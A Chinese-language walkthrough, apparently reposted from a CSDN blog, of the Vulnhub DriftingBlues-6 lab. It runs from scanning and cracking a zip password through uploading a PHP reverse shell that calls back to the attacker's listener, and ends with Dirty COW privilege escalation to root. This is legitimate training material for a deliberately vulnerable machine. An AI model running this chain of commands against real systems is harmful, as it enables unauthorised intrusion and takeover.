攻击机ip

192.168.159.88

扫描主机

arp-scan -I eth0 -l

得到靶机ip:

192.168.159.144

扫描端口

nmap -sS -A -sV -T4 -p- 192.168.159.144

访问网页

192.168.159.144

没发现什么有用的信息

目录扫描

使用dirb发现了robots.txt和/textpattern/textpattern

dirb 192.168.159.144

扫描网站的后台发现了robots.txt ，访问

User-agent: *Disallow: /textpattern/textpatterndont forget to add .zip extension to your dir-brute;)

发现禁止爬取，然后根据提示访问 /textpattern/textpattern 发现了登入后台

进入后台，访问

http://192.168.159.144/textpattern/textpattern/

但是我们没有账号和密码

使用工具gobuster寻找后缀为zip的目录

安装工具gobuster

apt-get install gobuster

安装seclists字典：

apt-get install seclists

扫描目录

gobuster dir -u “192.168.159.144” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak

指纹识别出是Textpattern CMS

robots.txt中还有提示不要忘了zip，看到扫描结果中有 /spammer.zip，下载得到一个压缩包，尝试打开发现有密码

gobuster dir -u http://192.168.159.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip

访问

http://192.168.159.144/spammer.zip

得到一个有密码的zip文件

使用kali破解zip压缩包密码

1.使用zip2john爆破得到zip密码

zip2john spammer.zip > password.txt

使用john破解

john password.txt

得到密码

myspace4

解压zip文件

得到了一个用户名和密码

mayer:lionheart

用这个用户名和密码登入之前的网址

http://192.168.159.144/textpattern/textpattern/

进去后看到cms的版本是4.8.3

思路一：kali本地搜索漏洞

searchsploit textpattern 4.8.3

查看49620.py详细信息与使用方法

searchsploit -x php/webapps/49620.py

python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d

输入命令

因为回看脚本，他会自己给你加一个testpattern，所以url参数就不用加那么多textpattern了

python3 48943.py http://192.168.159.144/textpattern mayer lionheart

发现还是报错，用不了

思路二：寻找网站内的漏洞

在content那发现存在文件上传

在该处上传kali上的/usr/share/webshells/php/php-reverse-shell.php，上传前需要修ip和port 分别为攻击机ip和攻击机监听的tcp端口。

cd /usr/share/webshells/php

修改php

上传shell

监听1234端口

nc -nlvp 1234

上传webshell

我们在admin管理界面可以看到上传地址

访问

http://192.168.159.144/textpattern/files

点击php-reverse-shell.php

回到kali已经监听成功

获得交互shell

python -c 'import pty; pty.spawn("/bin/bash")'

脏牛提权

查看linux的版本信息

uname -a

内核版本>= 2.6.22 ，尝试脏牛提权

在github上下载提权脚本

https://github.com/FireFart/dirtycow

然后通过网站的文件上传漏洞解压后上传至后台

进入上传文件的文件夹

cd  /var/www/textpattern/files

进行编译，生成一个dirty的可执行文件

gcc -pthread dirty.c -o dirty -lcrypt

执行文件

./dirty

然后会让我们输入一个密码

然后我们可以用用户名：firefart 密码:root

进入一个有root权限的用户

切换用户

su firefart

进入/root

cd /root

得到flag.txt

参考文章

http://t.csdn.cn/nvjQGhttp://t.csdn.cn/Jp7Kuhttps://github.com/FireFart/dirtycow

来源地址：https://blog.csdn.net/m0_62584974/article/details/127036316

文章详情

靶机渗透练习Vulnhub DriftingBlues-6

攻击机ip

扫描主机

扫描端口

目录扫描

使用kali破解zip压缩包密码

思路二：寻找网站内的漏洞

脏牛提权

软考中级精品资料免费领

相关文章

猜你喜欢

靶机渗透练习Vulnhub DriftingBlues-6

VulnHub-DarkHole_1靶机详细渗透教程

文件上传漏之upload靶场练习——渗透day12